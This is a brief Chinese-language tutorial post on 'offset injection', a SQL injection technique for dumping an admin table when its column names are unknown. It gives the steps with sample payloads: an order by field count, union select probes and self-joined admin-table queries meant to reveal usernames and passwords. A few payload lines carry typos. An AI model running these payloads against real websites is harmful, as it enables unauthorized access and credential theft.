渗透————偏移注入


            偏移注入:在注入过程中,可能会遇到注入知道表名,但是不知道列名,从而无法继续猜解,此时需要偏移注入解决。

            偏移注入的流程:

                 1,判断字段数。例如:order by 猜字段数为22

                 2,判断表名。例如:union select 1,2,,,22 from admin (联合查询爆显位)

                 3,开始偏移注入。

                             union select 1,2,,,,,,21 * from admin   //判断管理表的字段数,逐步测试直到显示正常为止,如到16时返回正常,则证明管理表里面有6个字段

                             union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b ona.id=b.id)     //admin为表a与表b,每个表6个字段

                             union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as bon a.id=b.id) inner join admin as c on a.id=c.id)    //如果上述没爆到关键信息,则继续执行二级偏移注入查询。

             偏移注入需要注意的几个点:管理表的字段数越少(一般三个username、id、password)、知道的管理表字段越多我们就越容易成功。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值